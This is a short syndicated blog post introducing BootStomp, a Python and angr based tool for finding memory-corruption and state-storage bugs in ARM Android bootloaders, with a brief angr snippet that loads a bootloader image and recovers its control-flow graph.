BootStomp – Find Android Bootloader Vulnerabilities

Post Syndicated from Darknet original https://www.darknet.org.uk/2018/02/bootstomp-find-android-bootloader-vulnerabilities/?utm_source=rss&utm_medium=social&utm_campaign=darknetfeed

BootStomp – Find Android Bootloader Vulnerabilities

BootStomp is a Python-based tool, with Docker support, that helps you find two different classes of Android bootloader vulnerabilities and bugs: memory corruption and state-storage issues.

Note that BootStomp works with bootloaders compiled for ARM architectures (both 32- and 64-bit) and that results might vary slightly depending on the versions of angr and Z3. This is because of the time angr takes to analyze basic blocks and because of Z3’s expression concretization results.
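
As a rough illustration of what that analysis involves (a generic angr sketch under assumed file names and load addresses, not BootStomp’s actual code), loading a raw ARM bootloader image and recovering its basic blocks looks roughly like this:

    import angr

    # Load a raw (headerless) ARM bootloader dump. The file name, architecture
    # variant, and base address are assumptions for illustration.
    proj = angr.Project(
        "bootloader.bin",
        main_opts={"backend": "blob", "arch": "armel", "base_addr": 0x0},
        auto_load_libs=False,
    )

    # Building the CFG is the step whose runtime (together with Z3's expression
    # concretization) can make results vary between angr/Z3 versions.
    cfg = proj.analyses.CFGFast()
    print(proj.arch.name, "-", len(cfg.graph.nodes()), "basic blocks recovered")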

Read the rest of BootStomp – Find Android Bootloader Vulnerabilities now! Only available at Darknet.